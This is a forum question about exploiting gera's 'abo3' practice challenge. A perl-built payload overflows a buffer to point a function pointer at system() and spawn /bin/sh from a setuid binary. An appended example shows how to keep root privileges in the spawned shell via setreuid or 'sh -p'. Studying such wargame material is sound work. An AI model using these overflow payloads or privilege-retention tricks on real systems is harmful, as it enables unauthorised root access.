OK, I'm exploiting a simple program by overwriting a function pointer with the address of system(). I am passing "/bin/sh" to it. I had expected to end up with the same privileges I had before, as I was under the impression that system() executes programs using /bin/sh, which apparently drops privileges. I wasn't disappointed in this regard.
Code:
/* abo3.c *
 * specially crafted to feed your brain by gera */
/* This'll prepare you for The Next Step */
/* Note: the parameter names are swapped on purpose (argv is the count, argc the
 * vector), and system/puts are declared as implicit-int externs; pulling in
 * stdlib.h/stdio.h would clash with those declarations, so the file is kept
 * exactly as gera wrote it. */
int main(int argv,char **argc) {
extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;
char buf[256]; /* on this compiler's frame layout, fn lies just past buf */
fn=(void(*)(char*))&puts;
strcpy(buf,argc[1]); /* unbounded copy: argc[1] (68*4 = 272 bytes above) runs over fn */
fn(argc[2]); /* once fn holds &system, this is system(argc[2]) */
exit(1);
}
Quote:
nnp@torvalds:~/coding/geras/abo$ sudo chmod +s abo3
nnp@torvalds:~/coding/geras/abo$ ls -al
total 40
drwxr-xr-x 2 nnp users 4096 2006-05-18 21:03 .
drwxr-xr-x 3 nnp users 4096 2006-05-18 19:52 ..
-rwsr-sr-x 1 root root 11991 2006-05-18 20:50 abo3
-rw-r--r-- 1 nnp users 219 2006-05-18 19:53 abo3.c
-rwxr-xr-x 1 nnp users 11685 2006-05-18 21:03 test
-rw-r--r-- 1 nnp users 97 2006-05-18 20:05 test.c
nnp@torvalds:~/coding/geras/abo$ ./abo3 `perl -e 'print "\x60\x57\xef\xb7"x68'` "/bin/sh"
sh-3.00$ id
uid=1000(nnp) gid=100(users) groups=6(disk),10(wheel),17(audio),18(video),19(cdrom),100(users)
sh-3.00$
I was then talking to a friend of mine who said I was wrong and that /bin/sh did not drop privs. He showed me his output:
Quote:
$ ls -al ./abo3 ; ./abo3 `perl -e 'print "\xc8\x61\xee\xb7" x 68'` "/bin/sh"
ykram -rwsr-xr-x 1 root root 11771 2006-05-18 15:09 ./abo3
ykram sh-3.00# whoami
ykram root
He is quite adamant that, using the same method, he ends up with an effective uid of 0. The man page has this to say on the matter:
Quote:
system() will not, in fact, work properly from programs with suid or sgid privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup.
Both my friend and I are using the same version, though:
Quote:
nnp@torvalds:~$ /bin/sh --version
GNU bash, version 3.00.16(2)-release (i486-slackware-linux-gnu)
Copyright © 2004 Free Software Foundation, Inc.
nnp@torvalds:~$
Although his doesn't have the Slackware-specific part.
The thing is: if I'm root and run /bin/sh, then in sh run /bin/sh again, the prompt I get is still root, so it's quite obviously not dropping privs then. But if I use the following program it does drop privs. Aghghh!!!!
Code:
nnp@torvalds:~$ ls -al | grep test | grep -v test.c | grep -v contest
-rwsr-sr-x 1 root root 15125 2006-05-19 19:06 test
nnp@torvalds:~$ cat test.c
#include <stdlib.h>
int main() {
/* binary is setuid root; system() runs `sh -c /bin/sh` on its behalf */
system("/bin/sh");
return 0;
}
nnp@torvalds:~$ ./test
sh-3.00$ i
sh: i: command not found
sh-3.00$ id
uid=1000(nnp) gid=100(users) groups=6(disk),10(wheel),17(audio),18(video),19(cdrom),100(users)
sh-3.00$
Also, for some reason, when I run the above program it takes the first letter I type as a command, as if I'd pressed return... odd.
Anyone know what I'm misunderstanding?
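The following is an added example, not code from the post or from gera's challenge set, showing the mechanism the quoted system(3) note refers to: a shell spawned from a setuid binary compares its real and effective uid at startup and, unless it was started with -p, sets the effective uid back to the real one. It assumes /bin/sh is bash (as in both shell transcripts above) and that bash's rule is "drop when uid != euid and -p was not given"; the helper names (bash_would_drop, make_euid_real, ids_match, format_ids) are this example's own. It does not explain the friend's run, which the page gives no further detail on; it shows why test.c lands at uid 1000 and what has to happen before the spawn for the effective uid to survive.

```c
/*
 * Added example (not part of the original post). Why a shell spawned from a
 * setuid binary comes up unprivileged, and what to do before the spawn.
 *
 * Assumption: /bin/sh is bash, which at startup compares getuid() with
 * geteuid() and, unless started with -p, sets euid := uid.
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Bash's startup rule reduced to its two inputs: the effective uid is given
 * up only when it differs from the real uid AND the shell was not asked to
 * keep it with -p. Returns 1 if the euid will be dropped, 0 otherwise. */
int bash_would_drop(uid_t uid, uid_t euid, int privileged_mode)
{
    int running_setuid = (uid != euid);
    return running_setuid && !privileged_mode;
}

/* Make the real uid/gid equal to the effective ones. After this a shell sees
 * uid == euid and has nothing to drop. Returns 0 on success, -1 on failure
 * (errno set by setregid/setreuid). */
int make_euid_real(void)
{
    uid_t euid = geteuid();
    gid_t egid = getegid();
    if (setregid(egid, egid) != 0)
        return -1;
    if (setreuid(euid, euid) != 0)
        return -1;
    return 0;
}

/* 1 if real and effective ids agree, 0 otherwise. */
int ids_match(void)
{
    return getuid() == geteuid() && getgid() == getegid();
}

/* Write "uid=.. euid=.. gid=.. egid=.." into buf; returns the length. */
int format_ids(char *buf, size_t n)
{
    return snprintf(buf, n, "uid=%u euid=%u gid=%u egid=%u",
                    (unsigned)getuid(), (unsigned)geteuid(),
                    (unsigned)getgid(), (unsigned)getegid());
}

int main(int argc, char **argv)
{
    char ids[128];
    format_ids(ids, sizeof ids);
    printf("before: %s\n", ids);

    if (argc > 1 && strcmp(argv[1], "naive") == 0) {
        /* What the post's test.c does. system() runs `sh -c /bin/sh`; that
         * outer sh already has uid != euid and drops, so even an inner
         * `/bin/sh -p` would inherit the already-lowered euid. */
        return system("/bin/sh");
    }

    /* Collapse real onto effective first, then spawn: the shell now starts
     * with uid == euid and keeps whatever the setuid binary had. */
    if (make_euid_real() != 0) {
        perror("setreuid");
        return 1;
    }
    format_ids(ids, sizeof ids);
    printf("after:  %s\n", ids);

    /* Equivalent without touching ids: exec the shell with -p directly, with
     * no intermediate `sh -c` in between. Uncomment to try:
     * execl("/bin/sh", "sh", "-p", (char *)NULL); */
    return system("/bin/sh");
}
```

Build it, chmod u+s as root, and run it as an ordinary user with and without the `naive` argument: the naive path reproduces the `uid=1000` result from the post, the other path reports matching ids before the shell starts. Note that putting -p inside the string handed to system() does not help, because the `sh -c` that system() interposes has already dropped the effective uid before the inner shell is exec'd.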